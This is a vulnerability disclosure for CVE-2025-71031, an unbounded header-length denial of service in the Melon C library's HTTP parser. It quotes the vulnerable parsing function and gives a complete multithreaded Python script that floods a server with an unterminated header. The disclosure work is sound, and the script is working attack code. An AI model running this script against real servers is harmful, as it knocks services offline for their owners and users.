(CVE-2025-71031) Denial of Service in Melon C library

Summary

The 'Melon HTTP' component doesn't have any maximum length. As a result, an excessive request header could cause a denial of service by consuming RAM memory.

Details

Vulnerable component: Melon HTTP - https://github.com/Water-Melon/Melon/blob/master/src/mln_http.c

Version: commit 9df9292 and below

Melon HTTP source code

The web server checks buffers until it finds \n (new line). If the condition is not satisfy it returns the M_HTTP_RET_OK response. if not, it returns M_HTTP_RET_DONE.

M_HTTP_RET_OK means parsing is not completed but no error occurs, continue to pass in new data to complete the parsing.

M_HTTP_RET_DONE means parsing completed.

MLN_FUNC(static inline, int, mln_http_line_length, \
         (mln_http_t *http, mln_chain_t *in, mln_size_t *len), \
         (http, in, len), \
{
    mln_buf_t *b;
    mln_u8ptr_t p, end;
    mln_size_t length = 0;

    while (in != NULL) {
        b = in->buf;
        if (b == NULL || b->in_file || mln_buf_left_size(b) <= 0) {
            in = in->next;
            continue;
        }
        for (p = b->left_pos, end = b->last; p < end; ++p) {
            if (*p == (mln_u8_t)'\n') break;
            ++length;
        }
        if (p >= end) {
            in = in->next;
            continue;
        }
        break;
    }
    if (in == NULL) return M_HTTP_RET_OK;

    *len = length;
    return M_HTTP_RET_DONE;
})

Steps to reproduce

Compile the Melon library using your prefer method. More methods can be found - https://github.com/Water-Melon/Melon
Melon HTTP source code example - https://github.com/Water-Melon/Melon/blob/master/docs/book/en/http.md
Compile the Melon HTTP source code to an executable.
Initiate the web server
Run this exploit. Adjust the payload as you see fit.

import socket
import threading
import time
import random

target_ip = "127.0.0.1"
target_port = 1234
thread_count = 500

def nuke():
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(4)
            s.connect((target_ip, target_port))
            
            # Start a valid request
            s.send(b"GET / HTTP/1.1\r\n")
            s.send(b"Host: localhost\r\n")
            
            # Malicious header for testing DoS. Notice that \r\n isn't supplied
            s.send(b"X-Nuke: ")
            
            while True:
                # DoS
                s.send(b"A" * 65535)
                time.sleep(0.01) 
        except Exception:
            time.sleep(0.1)
            continue

print(f"[!] Testing DoS on {target_ip}:{target_port} with {thread_count} threads...")

for i in range(thread_count):
    t = threading.Thread(target=nuke)
    t.daemon = True
    t.start()
    if i % 50 == 0:
        print(f"[*] {i} threads active...")

try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("\n[!] Stopping attack.")

Observe CPU and RAM consumption spike

Proof of Concept

Previous(CVE-2024-50636) Arbitrary Code Execution in PyMOL NextFacebook malware in plain sight!

Last updated 27 days ago

hashtagSummary

hashtagDetails

hashtagSteps to reproduce

hashtagProof of Concept

Summary

Details

Steps to reproduce

Proof of Concept